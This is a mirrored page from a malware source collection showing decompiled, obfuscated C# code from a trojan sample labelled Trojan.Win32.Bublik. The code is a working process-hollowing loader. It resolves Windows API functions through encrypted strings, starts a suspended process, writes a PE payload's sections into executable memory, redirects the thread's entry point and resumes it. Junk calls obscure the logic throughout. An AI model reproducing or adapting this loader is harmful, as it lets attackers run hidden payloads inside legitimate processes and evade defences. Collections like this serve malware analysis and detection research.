mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-02 00:15:27 +00:00
311 lines
11 KiB
C#
311 lines
11 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type:
|
|||
|
// Assembly: server2, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A78406EB-6936-436A-BB47-86E06CAA33E0
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Bublik.elhu-93030ba4f113591d09e27371b9dd59bca9b156e6d79476cb61a95fcfbd5a3af3.exe
|
|||
|
|
|||
|
using System;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
|
|||
|
internal sealed class \u0003
|
|||
|
{
|
|||
|
private void \u0002() => Console.Write(\u0008.\u0002(-626735471));
|
|||
|
|
|||
|
[DllImport("kernel32")]
|
|||
|
private static extern IntPtr GetProcAddress(IntPtr _param0, string _param1);
|
|||
|
|
|||
|
[DllImport("kernel32")]
|
|||
|
private static extern IntPtr LoadLibrary(string _param0);
|
|||
|
|
|||
|
public void \u0002(byte[] _param1, string _param2, string _param3)
|
|||
|
{
|
|||
|
\u0003.\u0002\u2001 obj1 = new \u0003.\u0002\u2001();
|
|||
|
\u0003.\u0006\u2001 obj2 = new \u0003.\u0006\u2001();
|
|||
|
this.\u0002();
|
|||
|
\u0003.\u0002\u2002 structure1 = new \u0003.\u0002\u2002();
|
|||
|
\u0003.\u0006\u2000 structure2 = new \u0003.\u0006\u2000();
|
|||
|
this.\u0002();
|
|||
|
\u0003.\u000E\u2000 obj3 = new \u0003.\u000E\u2000();
|
|||
|
\u0003.\u000F\u2001 obj4 = new \u0003.\u000F\u2001();
|
|||
|
this.\u0002();
|
|||
|
structure2.\u0002 = (uint) Marshal.SizeOf((object) structure2);
|
|||
|
obj4.\u0002 = 65543U;
|
|||
|
this.\u0002();
|
|||
|
GCHandle gcHandle = GCHandle.Alloc((object) _param1, GCHandleType.Pinned);
|
|||
|
int int32 = gcHandle.AddrOfPinnedObject().ToInt32();
|
|||
|
this.\u0002();
|
|||
|
gcHandle.Free();
|
|||
|
\u0003.\u0002\u2001 structure3 = (\u0003.\u0002\u2001) Marshal.PtrToStructure((IntPtr) int32, typeof (\u0003.\u0002\u2001));
|
|||
|
this.\u0002();
|
|||
|
\u0003.\u0006\u2001 structure4 = (\u0003.\u0006\u2001) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001), typeof (\u0003.\u0006\u2001));
|
|||
|
this.\u0002();
|
|||
|
if (structure4.\u0002 != 17744U || structure3.\u0002 != (ushort) 23117)
|
|||
|
return;
|
|||
|
\u0003.\u0002 forFunctionPointer1 = (\u0003.\u0002) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735843)), typeof (\u0003.\u0002));
|
|||
|
\u0003.\u0005 forFunctionPointer2 = (\u0003.\u0005) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735864)), \u0008.\u0002(-626735816)), typeof (\u0003.\u0005));
|
|||
|
\u0003.\u0008 forFunctionPointer3 = (\u0003.\u0008) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735779)), typeof (\u0003.\u0008));
|
|||
|
this.\u0002();
|
|||
|
\u0003.\u0003 forFunctionPointer4 = (\u0003.\u0003) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735800)), typeof (\u0003.\u0003));
|
|||
|
\u0003.\u0006 forFunctionPointer5 = (\u0003.\u0006) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626735773)), typeof (\u0003.\u0006));
|
|||
|
\u0003.\u000E forFunctionPointer6 = (\u0003.\u000E) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626736488)), typeof (\u0003.\u000E));
|
|||
|
this.\u0002();
|
|||
|
\u0003.\u000F forFunctionPointer7 = (\u0003.\u000F) Marshal.GetDelegateForFunctionPointer(\u0003.GetProcAddress(\u0003.LoadLibrary(\u0008.\u0002(-626735648)), \u0008.\u0002(-626736463)), typeof (\u0003.\u000F));
|
|||
|
this.\u0002();
|
|||
|
int num1 = forFunctionPointer1(_param3, _param2, IntPtr.Zero, IntPtr.Zero, false, (\u0003.\u0002\u2000) 4, IntPtr.Zero, (string) null, ref structure2, out obj3) ? 1 : 0;
|
|||
|
int num2 = forFunctionPointer2(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000) ? 1 : 0;
|
|||
|
this.\u0002();
|
|||
|
if (!forFunctionPointer3(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, structure4.\u0005.\u000E\u2001, (\u0003.\u0008\u2000) 12288, (\u0003.\u0005\u2000) 64))
|
|||
|
return;
|
|||
|
int num3 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) structure4.\u0005.\u0005\u2000, _param1, structure4.\u0005.\u000F\u2001, (object) null) ? 1 : 0;
|
|||
|
this.\u0002();
|
|||
|
for (int index1 = 0; index1 <= (int) structure4.\u0003.\u0003 - 1; ++index1)
|
|||
|
{
|
|||
|
structure1 = (\u0003.\u0002\u2002) Marshal.PtrToStructure((IntPtr) (int32 + structure3.\u0006\u2001 + Marshal.SizeOf((object) structure4) + Marshal.SizeOf((object) structure1) * index1), typeof (\u0003.\u0002\u2002));
|
|||
|
byte[] numArray = new byte[(IntPtr) structure1.\u0008];
|
|||
|
for (int index2 = 0; index2 <= (int) structure1.\u0008 - 1; ++index2)
|
|||
|
numArray[index2] = _param1[(long) structure1.\u0006 + (long) index2];
|
|||
|
this.\u0002();
|
|||
|
int num4 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (structure4.\u0005.\u0005\u2000 + structure1.\u0005), numArray, structure1.\u0008, (object) null) ? 1 : 0;
|
|||
|
}
|
|||
|
int num5 = forFunctionPointer5(obj3.\u0003, ref obj4) ? 1 : 0;
|
|||
|
this.\u0002();
|
|||
|
byte[] bytes = BitConverter.GetBytes(structure4.\u0005.\u0005\u2000);
|
|||
|
int num6 = forFunctionPointer4(obj3.\u0002, (IntPtr) (long) (obj4.\u0002\u2001 + 8U), bytes, (uint) bytes.Length, (object) null) ? 1 : 0;
|
|||
|
obj4.\u0008\u2001 = structure4.\u0005.\u0005\u2000 + structure4.\u0005.\u000F;
|
|||
|
this.\u0002();
|
|||
|
int num7 = forFunctionPointer6(obj3.\u0003, ref obj4) ? 1 : 0;
|
|||
|
int num8 = (int) forFunctionPointer7(obj3.\u0003);
|
|||
|
}
|
|||
|
|
|||
|
private delegate bool \u0002(
|
|||
|
string _param1,
|
|||
|
string _param2,
|
|||
|
IntPtr _param3,
|
|||
|
IntPtr _param4,
|
|||
|
bool _param5,
|
|||
|
\u0003.\u0002\u2000 _param6,
|
|||
|
IntPtr _param7,
|
|||
|
string _param8,
|
|||
|
ref \u0003.\u0006\u2000 _param9,
|
|||
|
out \u0003.\u000E\u2000 _param10);
|
|||
|
|
|||
|
private delegate bool \u0003(
|
|||
|
IntPtr _param1,
|
|||
|
IntPtr _param2,
|
|||
|
byte[] _param3,
|
|||
|
uint _param4,
|
|||
|
object _param5);
|
|||
|
|
|||
|
private delegate bool \u0005(IntPtr _param1, IntPtr _param2);
|
|||
|
|
|||
|
private delegate bool \u0006(IntPtr _param1, ref \u0003.\u000F\u2001 _param2);
|
|||
|
|
|||
|
private delegate bool \u0008(
|
|||
|
IntPtr _param1,
|
|||
|
IntPtr _param2,
|
|||
|
uint _param3,
|
|||
|
\u0003.\u0008\u2000 _param4,
|
|||
|
\u0003.\u0005\u2000 _param5);
|
|||
|
|
|||
|
private delegate bool \u000E(IntPtr _param1, [In] ref \u0003.\u000F\u2001 _param2);
|
|||
|
|
|||
|
private delegate uint \u000F(IntPtr _param1);
|
|||
|
|
|||
|
private enum \u0002\u2000 : uint
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
private struct \u0002\u2002
|
|||
|
{
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 8)]
|
|||
|
public byte[] \u0002;
|
|||
|
public uint \u0003;
|
|||
|
public uint \u0005;
|
|||
|
public uint \u0008;
|
|||
|
public uint \u0006;
|
|||
|
public uint \u000E;
|
|||
|
public uint \u000F;
|
|||
|
public ushort \u0002\u2000;
|
|||
|
public ushort \u0003\u2000;
|
|||
|
public uint \u0005\u2000;
|
|||
|
}
|
|||
|
|
|||
|
private enum \u0003\u2000 : uint
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
private enum \u0005\u2000 : uint
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
private struct \u0006\u2000
|
|||
|
{
|
|||
|
public uint \u0002;
|
|||
|
public string \u0003;
|
|||
|
public string \u0005;
|
|||
|
public string \u0008;
|
|||
|
public uint \u0006;
|
|||
|
public uint \u000E;
|
|||
|
public uint \u000F;
|
|||
|
public uint \u0002\u2000;
|
|||
|
public uint \u0003\u2000;
|
|||
|
public uint \u0005\u2000;
|
|||
|
public uint \u0008\u2000;
|
|||
|
public uint \u0006\u2000;
|
|||
|
public short \u000E\u2000;
|
|||
|
public short \u000F\u2000;
|
|||
|
public IntPtr \u0002\u2001;
|
|||
|
public IntPtr \u0003\u2001;
|
|||
|
public IntPtr \u0005\u2001;
|
|||
|
public IntPtr \u0008\u2001;
|
|||
|
}
|
|||
|
|
|||
|
private enum \u0008\u2000 : uint
|
|||
|
{
|
|||
|
}
|
|||
|
|
|||
|
private struct \u000E\u2000
|
|||
|
{
|
|||
|
public IntPtr \u0002;
|
|||
|
public IntPtr \u0003;
|
|||
|
public uint \u0005;
|
|||
|
public uint \u0008;
|
|||
|
}
|
|||
|
|
|||
|
private struct \u000F\u2000
|
|||
|
{
|
|||
|
public int \u0002;
|
|||
|
public IntPtr \u0003;
|
|||
|
public bool \u0005;
|
|||
|
}
|
|||
|
|
|||
|
private struct \u0002\u2001
|
|||
|
{
|
|||
|
public ushort \u0002;
|
|||
|
public ushort \u0003;
|
|||
|
public ushort \u0005;
|
|||
|
public ushort \u0008;
|
|||
|
public ushort \u0006;
|
|||
|
public ushort \u000E;
|
|||
|
public ushort \u000F;
|
|||
|
public ushort \u0002\u2000;
|
|||
|
public ushort \u0003\u2000;
|
|||
|
public ushort \u0005\u2000;
|
|||
|
public ushort \u0008\u2000;
|
|||
|
public ushort \u0006\u2000;
|
|||
|
public ushort \u000E\u2000;
|
|||
|
public ushort \u000F\u2000;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
|
|||
|
public ushort[] \u0002\u2001;
|
|||
|
public ushort \u0003\u2001;
|
|||
|
public ushort \u0005\u2001;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
|
|||
|
public ushort[] \u0008\u2001;
|
|||
|
public int \u0006\u2001;
|
|||
|
}
|
|||
|
|
|||
|
private struct \u0003\u2001
|
|||
|
{
|
|||
|
public ushort \u0002;
|
|||
|
public ushort \u0003;
|
|||
|
public uint \u0005;
|
|||
|
public uint \u0008;
|
|||
|
public uint \u0006;
|
|||
|
public ushort \u000E;
|
|||
|
public ushort \u000F;
|
|||
|
}
|
|||
|
|
|||
|
private struct \u0005\u2001
|
|||
|
{
|
|||
|
public uint \u0002;
|
|||
|
public uint \u0003;
|
|||
|
}
|
|||
|
|
|||
|
private struct \u0006\u2001
|
|||
|
{
|
|||
|
public uint \u0002;
|
|||
|
public \u0003.\u0003\u2001 \u0003;
|
|||
|
public \u0003.\u0008\u2001 \u0005;
|
|||
|
}
|
|||
|
|
|||
|
private struct \u0008\u2001
|
|||
|
{
|
|||
|
public ushort \u0002;
|
|||
|
public byte \u0003;
|
|||
|
public byte \u0005;
|
|||
|
public uint \u0008;
|
|||
|
public uint \u0006;
|
|||
|
public uint \u000E;
|
|||
|
public uint \u000F;
|
|||
|
public uint \u0002\u2000;
|
|||
|
public uint \u0003\u2000;
|
|||
|
public uint \u0005\u2000;
|
|||
|
public uint \u0008\u2000;
|
|||
|
public uint \u0006\u2000;
|
|||
|
public ushort \u000E\u2000;
|
|||
|
public ushort \u000F\u2000;
|
|||
|
public ushort \u0002\u2001;
|
|||
|
public ushort \u0003\u2001;
|
|||
|
public ushort \u0005\u2001;
|
|||
|
public ushort \u0008\u2001;
|
|||
|
public uint \u0006\u2001;
|
|||
|
public uint \u000E\u2001;
|
|||
|
public uint \u000F\u2001;
|
|||
|
public uint \u0002\u2002;
|
|||
|
public ushort \u0003\u2002;
|
|||
|
public ushort \u0005\u2002;
|
|||
|
public uint \u0008\u2002;
|
|||
|
public uint \u0006\u2002;
|
|||
|
public uint \u000E\u2002;
|
|||
|
public uint \u000F\u2002;
|
|||
|
public uint \u0002\u2003;
|
|||
|
public uint \u0003\u2003;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
|
|||
|
public \u0003.\u0005\u2001[] \u0005\u2003;
|
|||
|
}
|
|||
|
|
|||
|
private struct \u000E\u2001
|
|||
|
{
|
|||
|
public uint \u0002;
|
|||
|
public uint \u0003;
|
|||
|
public uint \u0005;
|
|||
|
public uint \u0008;
|
|||
|
public uint \u0006;
|
|||
|
public uint \u000E;
|
|||
|
public uint \u000F;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 80)]
|
|||
|
public byte[] \u0002\u2000;
|
|||
|
public uint \u0003\u2000;
|
|||
|
}
|
|||
|
|
|||
|
private struct \u000F\u2001
|
|||
|
{
|
|||
|
public uint \u0002;
|
|||
|
public uint \u0003;
|
|||
|
public uint \u0005;
|
|||
|
public uint \u0008;
|
|||
|
public uint \u0006;
|
|||
|
public uint \u000E;
|
|||
|
public uint \u000F;
|
|||
|
public \u0003.\u000E\u2001 \u0002\u2000;
|
|||
|
public uint \u0003\u2000;
|
|||
|
public uint \u0005\u2000;
|
|||
|
public uint \u0008\u2000;
|
|||
|
public uint \u0006\u2000;
|
|||
|
public uint \u000E\u2000;
|
|||
|
public uint \u000F\u2000;
|
|||
|
public uint \u0002\u2001;
|
|||
|
public uint \u0003\u2001;
|
|||
|
public uint \u0005\u2001;
|
|||
|
public uint \u0008\u2001;
|
|||
|
public uint \u0006\u2001;
|
|||
|
public uint \u000E\u2001;
|
|||
|
public uint \u000F\u2001;
|
|||
|
public uint \u0002\u2002;
|
|||
|
public uint \u0003\u2002;
|
|||
|
public uint \u0005\u2002;
|
|||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 512)]
|
|||
|
public byte[] \u0008\u2002;
|
|||
|
}
|
|||
|
}
|